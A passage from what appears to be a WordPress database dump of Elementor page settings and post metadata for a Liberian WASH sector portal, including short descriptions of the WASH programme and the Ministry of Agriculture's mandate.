Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27303,3961,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27304,3961,'_thumbnail_id','3188'),(27305,1602,'internet','http://www.lla.gov.lr/'),(27306,1602,'_pods_institution_logo','a:1:{i:0;i:2667;}'),(27307,1602,'institution_logo','2667'),(27308,1544,'_last_editor_used_jetpack','classic-editor'),(27309,1544,'internet','https://www.lisgis.net/'),(27310,1544,'_pods_institution_logo','a:1:{i:0;i:2472;}'),(27312,1544,'institution_logo','2472'),(27313,2457,'_last_editor_used_jetpack','classic-editor'),(27314,3963,'_elementor_edit_mode','builder'),(27315,3963,'_elementor_template_type','wp-post'),(27316,3963,'_elementor_version','2.7.5'),(27317,3963,'_wp_page_template','default'),(27318,3963,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c15c0a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"67bf510\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f23c00\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"06ca2c7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"wash\\\",\\\"tag_id\\\":\\\"166\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"wash\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27319,3963,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27320,3963,'_thumbnail_id','2724'),(27321,2457,'internet','https://wash-liberia.org/'),(27322,2457,'_pods_institution_logo','a:1:{i:0;i:2469;}'),(27323,2457,'institution_logo','2469'),(27324,1600,'_last_editor_used_jetpack','classic-editor'),(27325,3964,'_elementor_edit_mode','builder'),(27326,3964,'_elementor_template_type','wp-post'),(27327,3964,'_elementor_version','2.7.5'),(27328,3964,'_wp_page_template','default'),(27329,3964,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b499042\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e7777d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"95e395c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ecf4b97\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"moa\\\",\\\"tag_id\\\":\\\"61\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"moa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc19bed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1cf2e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d176b2f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27330,3964,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27331,3964,'_thumbnail_id','2782'),(27333,1600,'internet','https://www.moa.gov.lr/'),(27334,1600,'_pods_institution_logo','a:1:{i:0;i:2182;}'),(27335,1600,'institution_logo','2182'),(27336,3041,'_last_editor_used_j